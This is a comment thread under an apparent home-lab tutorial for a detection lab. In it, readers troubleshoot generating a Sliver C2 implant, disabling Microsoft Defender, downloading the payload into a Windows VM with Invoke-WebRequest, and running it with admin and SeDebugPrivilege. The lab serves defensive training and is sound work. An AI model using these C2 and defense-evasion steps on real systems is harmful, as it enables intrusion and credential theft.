84 Comments

Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.

Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!

Expand full comment
author

Make sure the payload is actually there by cd'ing to that location and running ls

cd C:\Users\User\Downloads\

ls

Make sure you see it there, if not, re-download it.

Expand full comment
Jun 10, 2023·edited Jun 10, 2023

It wasn't there! While redownloading I noticed a pop-up in the Windows VM notifying me of a security risk "NUCLEAR_CHAIR.exe"

I clicked the notification and selected "allow on device." I can try to continue from here, but I must've missed something during the steps disabling this on the Windows VM. Should I go back and reconfigure the Windows VM from the first section?

Thank you for your quick response and assistance!

Expand full comment

Just to follow up - I went back and re-disabled Microsoft Defender following the steps before and realized I missed one of the steps in the regedit section.

Back on track and everything is working as it should! Thank you!

Expand full comment

Hello. I have the same issue-the payload file is on the Linux machine, but not the Windows VM in "Downloads,"-only the sensor is saved there. I re-ran through the steps, downloaded a second payload, same thing. I did not receive a pop-up in the Windows VM warning me of a security risk either time. So my payload files are not making it to the Windows VM.

Expand full comment

NM. Did not disable Defender on the Windows VM....

Expand full comment

Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?

Expand full comment

There is no need to SSH you can proceed with the steps mentioned above

Expand full comment
Apr 11, 2023·edited Apr 11, 2023

I am getting cd: /opt/sliver: not a directory for some reason.

Expand full comment
author

You must've missed a step in part 1, specifically the part where we run mkdir -p /opt/sliver

I recommend re-accomplishing the attack system setup steps in part 1.

Expand full comment

Thank you! I will try it again.

Expand full comment

Part 2, Step 7 gives me this error:

PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe

Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to

type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."

At line:1 char:10

+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException

+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Expand full comment

Fun stuff! I know this is old news now, but I have had two issues so far.

First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.

Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload ( love saying that) nothing happens. No joy.

I will attempt to start from the beginning and try again later today. Thanks!

Expand full comment

Hi Eric, when trying to run the C2 executable on Powershell I keep getting the error " Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" any idea how to troubleshoot? Do you think it might be Defender or because I downloaded the latest version of Microsoft and perhaps they patched the payload hmmm... I'll try to figure it out in the meantime.

Expand full comment

I had errors downloading the payload because of connection issues. What I did was revert back to the malware staged snapshot and redid the whole process this time successfully downloading the full payload correctly.

Expand full comment

Hi Eric, this has been a fun project so far, thanks!

I am not able to run the netstat cmd inside sliver and can't figure out why.

So far, everything other cmd works as intended, when I run netstat it just hangs forever with no data. I have to use ctrl+C to back out.

I am connected to the active session with the use [session ID] cmd

pwd shows C:/windows/system32

I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections

getprivs cmd shows the correct process attributes as enabled (exploit was ran as admin)

I'm blanking here, any help is appreciated.

Thanks!

Expand full comment

Hi Eric, thanks for this walkthrough.

I am trying to set up or generate the C2 payload as you described(generate --http 192.168.42.128 --save /opt/sliver) for my ubuntu server via Putty(ssh) but i get the error "error:unknown command, try help"

i have tried sudo but nothing is successful

Expand full comment

I have figured it out , Eric. there was space in the command(just before generate part) hence why it did not work. a little patience is needed to troubleshoot i guess

Expand full comment

Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it it showed up enabled. the next day it said disabled so I regenerated the implant and it was enabled. I then ran into errors dumping memory so I tried to use a new implant and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever ran into this?

Expand full comment
author

Make sure you are running the implant with admin privileges.

Expand full comment

Ye, that's the odd thing. I have in CMD launched the implant with admin. and I have also launched in GUI with admin. I even launched the same implant once and it worked and closed it and launched again and it didn't, and now none seem to want to work. I'm considering now its some bug on the Ubuntu side. Thanks for the reply!

Expand full comment

Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.

Expand full comment
author

Make sure you are working out of /opt/sliver by running this command first: cd /opt/sliver

Expand full comment

Thank you for the quick response.

Okay, that got me into /opt/sliver and I ran the sliver-server command like it said and I'm still getting nothing. Are these steps a little out of order or am I just that much of a rookie? I see the cd /opt/sliver command is step 6, but I needed it before step two.

Expand full comment
author

I am getting the sense that something got out of order here... I might try going back through the Linux VM setup instructions.

Expand full comment

So I followed the VM instructions accurately but what I think may be the issue is whenever I try running the command to download Sliver, I get a lot of "Err" codes -Temporary failure resolving 'archive.ubuntu.com', and "E:" codes- Failed to fetch http://archive.ubuntu.com.

The following command to create a working directory does nothing.

Expand full comment
author

Seems it may be an internet connectivity issue for the VM.

Expand full comment

I pinged 8.8.8.8 and it worked fine. It just doesn't work with domain names, it seems.

Expand full comment

I started back from the beginning and reinstalled the Linux VM. When I try to ping Google.com, I get this error: (ping: Google.com: temporary failure in name resolution). The last time, I also had this but ended up Googling how to add the Google IP addresses and make the ping work. I didn't realize none of the other domains would be reachable, which seems obvious now. Any idea why the Linux VM is having issues connecting to the internet? I followed everything to a T.

Expand full comment

Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.

It says command not found sometimes and sometimes just shows random github directory lines. Do help

Expand full comment
author

This is a symptom of using a different Ubuntu ISO than the one prescribed.. The desktop Ubuntu does not come with git preinstalled... Remedy with apt install git

Expand full comment

IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downloads\DARK_SHADE.exe

IWR : Unable to connect to the remote server

At line:1 char:1

+ IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downl ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebReques

t], WebException

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCo

mmand

I get this error when I try to download the payload from the Ubuntu VM to the Windows VM. Should i add a firewall rule or something?

Both my Windows and Ubuntu VM have the IP address of 10.0.2.15. They are configured using NAT.

Expand full comment
author

Both VMs cannot have the same IP. Make sure you have two different IPs on the VM subnet.

Expand full comment

I am using Virtual Box. Both the VMs are created in NAT mode. When I checked both IPs, they get assigned the same. I went with your blog for NAT. Should I use bridged mode instead?

Expand full comment
author

The NAT only impacts the VMs traffic leaving the VM subnet, it should not affect the internal IPs assigned within the VM subnet... Sorry, I cannot give much guidance on VirtualBox as I haven't used it in a couple years.

Expand full comment

Okay Eric.

And one more thing, when I install VMware workstation pro, it asks for admin rights to run, is it a problem if I give it that?

If I give admin rights, does it impact my folder creation and document saving rights?

Expand full comment

It worked! Thank you so much Eric!!

Expand full comment

No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:

PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe

IWR : Unable to connect to the remote server

At line:1 char:1

+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Any initial thoughts what I might be overlooking?

Expand full comment
author

In this case, port 22 doesn't play a role. The temporary web server should be listening on port 80. Be sure you've run the python3 -m http.server 80 step properly.

Expand full comment

Got it! thanks I been experiencing my VMS are running super slow. So I did some testing and I'm using about 90% of the 16gb of ram that I have on my laptop lol. I might have to upgrade or maybe I can get my hands on a window pc or laptop.

Expand full comment
Apr 15, 2023Liked by Eric Capuano

My PC has 16GB and was having the same experience while running the Win VM. It looks like that VM comes preconfigured with 8GB Memory and 4 Processors. I bumped the processors down to 2 instead of 4 and had a much better experience. Hope this is helpful!

Expand full comment
author

I'll add a comment in the post, thanks for pointing that out.

Expand full comment
Apr 16, 2023Liked by Eric Capuano

Glad to help. Also, thanks for putting this out there! It's my first time messing with a SIEM, much less standing one up in a virtualized environment. This has been really helpful to get some hands-on experience!

Expand full comment

hey I'm on part two running the web server "cd /opt/sliver python3 -m http.server 80 and it saying cd: too many arguments. Any ideas on how to get around this?

Expand full comment
author

Looks like you grabbed too many commands there. Run these commands separately.

cd /opt/sliver

python3 -m http.server 80

Expand full comment
Apr 1, 2023·edited Apr 1, 2023

Hi Eric, I am having an error at the sliver server part, when i type the generate --http IP --save/opt/sliver" command, i get the following error: rpc error code: = unknown desc = exit status 1. Any idea what might be wrong here?

Expand full comment
author

Hard to say. Try rebooting the Ubuntu VM and try again?

Expand full comment
Apr 1, 2023·edited Apr 1, 2023

I tried that, still didn't work. could it be because im trying ssh from the windows vm to the ubuntu vm? So slivering from windows VM?

Edit: I think i know why the error is showing, it is because on the sliver webpage on github the latest version is 1.5.36 whereas the version on the post is 1.5.34.

Expand full comment
author

I see, thanks for that - I'll take a look and see if I need to update the post.

Expand full comment

So i managed to download the latest version (1.5.36), still get the same error.

Expand full comment
author

Might take some troubleshooting. Try peeking into the sliver logs for errors. It's located at ~/.sliver/logs/sliver.log

Expand full comment

i went to the log file and found these errors:

ERRO[2023-04-03T00:12:00+01:00] [sliver/server/gogo/go.go:133] --- stdout ---

ERRO[2023-04-03T00:12:00+01:00] [sliver/server/gogo/go.go:134] --- stderr ---

ERRO[2023-04-03T00:12:00+01:00] [sliver/server/gogo/go.go:135] exit status 1

ERRO[2023-04-03T00:12:00+01:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown

Expand full comment

On "Start Command and Control Session" step 1c where we type "http" I keep getting errors:

[server] sliver > http

[*] Starting HTTP :80 listener ...

[*] Successfully started job #1

[!] Job #1 stopped (tcp/http)

[!] Job #1 stopped (tcp/http)

I get this over and over again when typing "http"

Any ideas?

Expand full comment
author

Try rebooting the Ubuntu VM. Seems to happen whenever silver exits unexpectedly and leaves an old listener running.

Expand full comment
Mar 26, 2023Liked by Eric Capuano

That worked for me! Thank you!

Expand full comment
Apr 10, 2023·edited Apr 10, 2023

I am having this same issue. I tried rebooting the Ubuntu VM, but still get this...

[server] sliver > http

[*] Starting HTTP :80 listener ...

[*] Successfully started job #1

[!] Job #1 stopped (tcp/http)

[!] Job #1 stopped (tcp/http)

Do you have any other ideas? I restarted the VM multiple times and no luck.

Thank you in advance.

Expand full comment
author

Perhaps try updating to the latest version of Sliver? Not sure why it's acting up... Also, be sure you are running it as root, required for binding to port 80.

Expand full comment

Hi Eric,

I already completed all of part 2 and trying to retrace my steps to start part 3, but not working for some reason. I updated sliver, restarted all machines several times and still nothing. Any other ideas? I am getting the same error code:

[server] sliver > http

[*] Starting HTTP :80 listener ...

[*] Successfully started job #1

[!] Job #1 stopped (tcp/http)

[!] Job #1 stopped (tcp/http)

Expand full comment
Jul 7, 2023Liked by Eric Capuano

Never mind. I forgot to log in as root.

Expand full comment

Please how do I enable the SeDebugPrivilege

Expand full comment